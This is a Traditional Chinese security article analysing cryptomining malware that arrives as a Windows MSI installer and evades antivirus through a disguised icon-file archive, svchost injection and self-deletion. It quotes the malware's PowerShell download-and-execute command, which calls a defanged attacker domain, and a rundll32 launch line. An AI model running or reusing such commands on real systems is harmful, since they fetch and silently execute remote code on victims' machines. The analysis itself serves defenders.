加密貨幣挖礦惡意軟體使用Windows installer繞過技術

加密貨幣挖礦惡意軟體開始使用一些包括Windows installer在內的新的繞過技術。

加密貨幣挖礦惡意軟體數量不斷增長的一個原因是其暴利性，另一個原因是可以在系統中不被檢測到，尤其是使用了不同的混淆技術後更難檢測。研究人員發現，攻擊者在不斷的向加密貨幣挖礦惡意軟體中添加混淆技術來繞過AV的檢測。

安裝器行為

圖1. 惡意軟體感染鏈

惡意軟體以Windows installer MSI文件的形式到達受害者機器，Windows installer MSI文件是一個用於安裝軟體的合法應用程序。使用真實的Windows組件可以使其看著不那麼可疑，而且可以繞過一些安全過濾器。

研究人員分析樣本的安裝過程發現，惡意MSI文件會將自己安裝到%AppData%RoamingMicrosoftWindowsTemplateFileZilla Server目錄下，如果用戶設備上不存在該目錄，就會創建該目錄。該目錄含有許多不同的文件，作為攻擊鏈的一部分：

·bat – 用於終止正在運行的反病毒軟體的腳步文件

·exe – 用於解壓釋放在另一個目錄中的icon.ico文件的解壓工具

·ico – 密碼保護的zip文件，顯示為icon文件

解壓icon.ico後出現兩個文件：

·ocx – 載入器模塊，負責解密和安裝加密貨幣挖礦模塊

·bin – 加密的，UPX打包的，Delphi 編譯的加密貨幣挖礦模塊

安裝過程的另一部分包含在%AppData%RoamingMicrosoftWindowsTemplateFileZilla Server中創建kernel文件ntdll.dll和Windows USER組件user32.dll。研究人員這是為了預防惡意軟體API的檢測。如下所示的配置文件也會釋放到 %UserTemp%[Random Number]文件夾中。

圖2. 挖礦機的配置文件

安裝過程使用的語言是Cyrillic而非英語，這或許暗示著惡意軟體來源的區域。

圖3. 安裝過程顯示窗口

進程注入和監視器創建

安裝後，在執行以下命令前，ex.exe文件會解壓icon.ico文件：

rundll32 default.ocx,Entry u

為注入代碼創建3個新Service Host (svchost.exe)進程。前兩個SvcHost進程起著監視器的作用。當注入的svchost進程中止後，這兩個進程負責通過powerShell命令重新下載Windows Installer (.msi)文件。

「powershell.exe -command $cli = new-Object System.Net.WebClient;$cli.Headers[『User-Agent』] = 『Windows Installer』;$f = 『C:\%UserTemp%.msi』; $cli.DownloadFile(『hxxps://superdomain1709[.]info/update[.]txt』, $f);Start-Process $f -ArgumentList 『/q』」

然後將第三個SvcHost進程注入到挖礦機模塊並使用下面的命令執行：

「%system32%svchost.exe –config=

圖4. 第三個Service Host進程

為了使用檢測和分析變得更難，惡意軟體還有自毀機制。首先，創建和執行下面的文件：

.cmD

然後刪除安裝目錄中的所有文件，並移除系統內所有的安裝痕迹。

惡意軟體非常特別的一點是使用主流的Windows Installer builder WiX作為打包器，有點像一層反檢測層。這也說明攻擊者在不斷努力來保證其創建活動處於隱蔽狀態。

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！